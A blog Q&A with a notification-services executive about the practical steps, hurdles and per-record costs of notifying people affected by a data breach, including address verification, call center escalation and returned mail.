Crisis Data Breach Response: Notification

Posted by Mark Greisiger

A Q&A with Larissa K. Crum, Executive Vice President at Immersion, Ltd.
As part of an ongoing series of posts, I’m talking to experts in the field about the true costs associated with “crisis” data breach response services. The first focuses on notification, and I spoke with Larissa K. Crum, Executive Vice President at Immersion, Ltd., which provides printing, mailing, emailing, call center, and returned mail management services.

At what point during a data breach does Immersion get the call?
I like to say that attorneys get the call on Friday at four p.m. and I get the call at seven. The first call usually goes out to an attorney (what we call the Breach Coach® in the eRisk Hub®) and sometimes forensics, but we’re getting calls sooner than we used to because of tight response deadlines. Since it’s such a small community in the industry, I’ll often get the heads up from someone I know about a project coming our way—we may not start the process of working with the company for another week, but it helps us look down the line and prepare. Occasionally we get a call from an employee who’s done a Google search. Most frequently, though, we hear from attorneys, insurance carriers and clients we already work with.

What happens after the call?
For our clients, we’ve already built an instant response plan so when we get the call it’s usually a matter of reminding everyone to follow the plan. With new clients, we build from scratch. But either way, we start with the address file and run a verification service to make sure the addresses are still valid. We look for people who’ve died so we can contact their next of kin according to regulations. Then we send out mail and sometimes email notifications. We set up the call center so it’s in place as soon as anything goes out because the majority of calls come in the first five to eight days after the notification goes out, and those people are usually the most upset and need to talk to someone.

What problems or hurdles do you typically encounter?
There are several. First, we are typically up against a regulatory deadline that is very tight, specifically with state or federal statutes that have a specified response deadline (e.g., 5 days, 30 days, 45 days). Some of these timelines seem long, but there are many parts of a data breach response effort that need to be coordinated, and you could end up eating days on cleaning up an address file, determining the signature at the bottom of the notice, or approving numerous versions of a letter.

The second common hurdle is thinking through the call center response process. Setting up a call center to handle notices (written, electronic or substitute notices) goes beyond supplying appropriate FAQs. Thinking through the call escalation process is often a bigger issue for a client, particularly on large breaches where you could have hundreds of calls a day escalated within the first week. Having a system in place and proper management is often the difference between a strong or weak data breach response effort. After all, if a call gets escalated back to the organization that had the breach and it is not handled properly, this is the last image that the affected individual has about your organization. I heard an industry colleague say it best, “think of the response to the response.”

The final problem most commonly overlooked is the return address that appears when the notice goes in the mail. Most organizations assume that it should be their address. However, if you think about the amount of return mail as a percentage of the total number of notices going out, you quickly realize that most organizations are not prepared to handle or manage the volume of notices that will come back. There is a direct correlation between the age of the addresses provided and the percentage of returned mail. The newer the addresses, the lower the percentage of returns. The older the addresses, the higher the percentage of returns.

What are the approximate costs for notification services?
The cost can be anywhere from $1 to $4 USD per record. The size of a company isn’t always reflective of the size of a breach—a company with five employees can hold over 1 million records. Because of the potential for data breach services to become very expensive very quickly, we recommend purchasing a cyber liability policy. Most carriers have pre-negotiated pricing with vendors that provide all of the elements in a data breach response effort, e.g. legal, forensics, notification, call center and credit monitoring. Having a cyber liability policy helps transfer the risk and cost of a data breach; however, organizations that proactively put together a data breach incident response plan can help mitigate the risk of a breach occurring.

In conclusion…
Thanks, Larissa, for sharing your experience and insights into the notification process. Note: Larissa’s cost estimates dovetail with our own findings in the NetDiligence® 2011 Cyber Liability & Data Breach Insurance Claims study.
